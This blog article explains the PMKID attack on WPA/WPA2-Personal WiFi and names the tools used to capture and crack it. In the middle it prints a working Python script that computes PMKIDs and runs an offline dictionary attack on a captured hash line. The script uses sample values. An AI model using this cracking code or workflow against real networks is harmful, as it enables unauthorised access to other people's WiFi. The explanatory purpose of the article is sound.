New Technique Makes Hacking WPA/WPA2 Even Easier

A new technique has been discovered by Jens “atom” Steube, the developer of the hashcat password cracker, that allows him to easily retrieve the Pairwise Master Key Identifier (PMKID) from a user’s router if it uses the WPA or WPA2 security standard with a pre-shared key.

The method can be used to crack the WiFi password of a router whose access point includes a PMKID in the first EAPOL frame of the handshake, which is typically the case when roaming or PMK caching is enabled. Older methods require the capture of the full four-way authentication handshake, whereas this technique only requires a single frame, which the access point sends as soon as a station attempts to associate.

This attack was found accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 would be much harder to attack because of its modern key exchange protocol, “Simultaneous Authentication of Equals” (SAE), which does not hand an attacker a value that can be checked offline against password guesses.

What is the difference between this and existing handshake attacks?

The main distinction from existing attacks is that a capture of the full EAPOL four-way handshake is not required. The new attack works on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame: the first message of the handshake, which the access point sends to the station.

The new method also removes the waiting. Because the frame comes from the access point as soon as an association is attempted, the attacker no longer has to wait for a legitimate user to connect, deauthenticate one to force a reconnect, or deal with retransmitted or incomplete handshakes. The per-guess cost of the cracking itself is unchanged, since it is dominated by the same PBKDF2 derivation of the PMK from the passphrase.

“In fact, many users don’t have the technical knowledge to change the PSK on their routers,” Steube told BleepingComputer. “They continue to use the manufacturer generated PSK and this makes attacking WPA feasible on a large group of WPA users.”

How does it work?

The attack extracts the RSN IE (Robust Security Network Information Element) from a single EAPOL frame. The RSN IE is an optional field that acts as the container for the Pairwise Master Key Identifier (PMKID), which the router generates and sends in the first EAPOL message when a client tries to connect to the WiFi network.

The PMK (Pairwise Master Key) is the key material the 4-way handshake uses to prove that both the client and the router know the Pre-Shared Key (PSK), i.e. the wireless password of the network. On a WPA/WPA2-Personal network the PMK is derived directly from the passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output), which is why any value computed from the PMK, such as the PMKID, can be attacked offline with password guesses.

“The PMKID is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address,” stated Steube’s post on this new method.

An overview of the technical details

In a Wireshark capture the RSN IE shows up as an optional element of 802.11 management frames and of the EAPOL-Key frame. Besides the cipher suites and the RSN capabilities flags, the element carries an optional PMKID list, and it is this PMKID field that the attack uses.

The PMKID is an HMAC-SHA1 tag truncated to 128 bits (16 bytes). The key is the PMK and the data part is the concatenation of the fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address, as shown below:

PMKID = HMAC-SHA1-128(PMK, “PMK Name” | MAC_AP | MAC_STA)
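The derivation above, carried through end to end as an added example (this is not Steube’s code and not hashcat’s): derive the PMK from a passphrase, compute the PMKID, write and parse a hash line in the PMKID*MAC_AP*MAC_STA*ESSID layout that hashcat’s mode 16800 consumes, and run a dictionary attack against it. It assumes a WPA/WPA2-Personal network (PMK = PBKDF2-HMAC-SHA1 of the passphrase, salted with the SSID); the network name, MAC addresses, passphrase and wordlist are constructed sample values, and the only external reference is the IEEE 802.11 PSK test vector used as a self-check.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

PBKDF2_ITERATIONS = 4096   # fixed by the WPA/WPA2-Personal PSK derivation
PMK_LEN = 32               # 256-bit PMK
PMKID_LEN = 16             # HMAC-SHA1 tag truncated to 128 bits


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This step dominates the per-guess cost of any offline attack on a PSK network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, dklen=PMK_LEN)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA): the 20-byte tag cut to 16 bytes.
    MAC order matters: access point (authenticator) first, station (supplicant) second."""
    tag = hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()
    return tag[:PMKID_LEN]


def mac_to_bytes(mac: str) -> bytes:
    """Accept 'aa:bb:cc:dd:ee:ff', 'aa-bb-cc-dd-ee-ff' or bare 'aabbccddeeff'."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("MAC address must be 6 bytes")
    return raw


def to_hashcat_16800(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """One line in hashcat's mode 16800 layout: PMKID*MAC_AP*MAC_STA*ESSID (ESSID hex-encoded)."""
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode("utf-8").hex()])


def parse_hashcat_16800(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """Inverse of to_hashcat_16800, with length checks so a malformed line fails loudly."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError("expected PMKID*MAC_AP*MAC_STA*ESSID")
    pmkid_hex, ap_hex, sta_hex, essid_hex = parts
    if len(pmkid_hex) != 2 * PMKID_LEN or len(ap_hex) != 12 or len(sta_hex) != 12:
        raise ValueError("bad field length")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex), bytes.fromhex(sta_hex),
            bytes.fromhex(essid_hex).decode("utf-8"))


def crack_pmkid(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on one captured PMKID: one PBKDF2 plus one HMAC per guess,
    with no client traffic and no further frames from the AP. Returns the passphrase or None."""
    pmkid, mac_ap, mac_sta, essid = parse_hashcat_16800(line)
    for candidate in candidates:
        if not 8 <= len(candidate) <= 63:       # valid WPA passphrases are 8..63 characters
            continue
        if compute_pmkid(derive_pmk(candidate, essid), mac_ap, mac_sta) == pmkid:
            return candidate
    return None


def check_known_pmk_vector() -> bool:
    """Self-check of derive_pmk against the IEEE 802.11 PSK test vector (passphrase "password", SSID "IEEE")."""
    expected = bytes.fromhex("f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
    return derive_pmk("password", "IEEE") == expected


# Constructed sample network (not taken from the article or from any real capture).
SAMPLE_SSID = "ExampleNet"
SAMPLE_MAC_AP = mac_to_bytes("00:11:22:33:44:55")
SAMPLE_MAC_STA = mac_to_bytes("66:77:88:99:aa:bb")
SAMPLE_PASSPHRASE = "default12345"   # stands in for a weak manufacturer-assigned PSK


def sample_capture_line() -> str:
    """The 16800 line an attacker would hold after recording EAPOL message 1 from the sample AP."""
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    pmkid = compute_pmkid(pmk, SAMPLE_MAC_AP, SAMPLE_MAC_STA)
    return to_hashcat_16800(pmkid, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_SSID)


if __name__ == "__main__":
    line = sample_capture_line()
    print("captured:", line)
    wordlist = ["password", "12345678", "default12345", "letmein123"]   # constructed wordlist
    print("recovered passphrase:", crack_pmkid(line, wordlist))
    print("PBKDF2 test vector ok:", check_known_pmk_vector())
```

Against a real network the line would come from a capture rather than from sample_capture_line, and the guessing loop would run on a GPU in hashcat; the point of the Python version is that everything the attacker needs is the four values on that one line, and that nothing about the attack bypasses the PBKDF2 work per guess, so a long random passphrase is no easier to recover than before.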

Read the full technical details HERE

What tools will I need to reproduce this?

In order to make use of this new attack you will need the following tools, the ones named in Steube’s original post: hcxdumptool, to capture the EAPOL frame carrying the PMKID from the access point; hcxtools (hcxpcaptool), to pull the PMKID, the two MAC addresses and the ESSID out of the capture into a hash line; and hashcat, which cracks that line offline with hash mode 16800 (WPA-PMKID-PBKDF2).

How many routers are affected by this issue?

At present we don’t know for which vendors or for how many routers this hack will work. Steube’s post says it is expected to work against all 802.11i/p/q/r networks with roaming functions enabled, which covers most modern routers. Two caveats apply: the access point must actually place a PMKID in the first EAPOL message (not every access point does), and the offline step only helps on WPA/WPA2-Personal (PSK) networks, because there the PMK is derived from the passphrase; on WPA2-Enterprise the PMK comes from the EAP exchange, and a long random passphrase remains out of reach of a dictionary or mask attack even when the PMKID has been captured.

Learn more about WiFi Security

If you would like to learn all about WiFi ethical hacking from the ground up, we have a 7.5 hour online course with a totally bonkers discount. Get it HERE.

Harikrishna Mekala

I am a programmer and tech enthusiast who loves to use my creative skills to solve complex problems. I also love to stay abreast of what is happening in the world of technology, reach me at: [email protected]
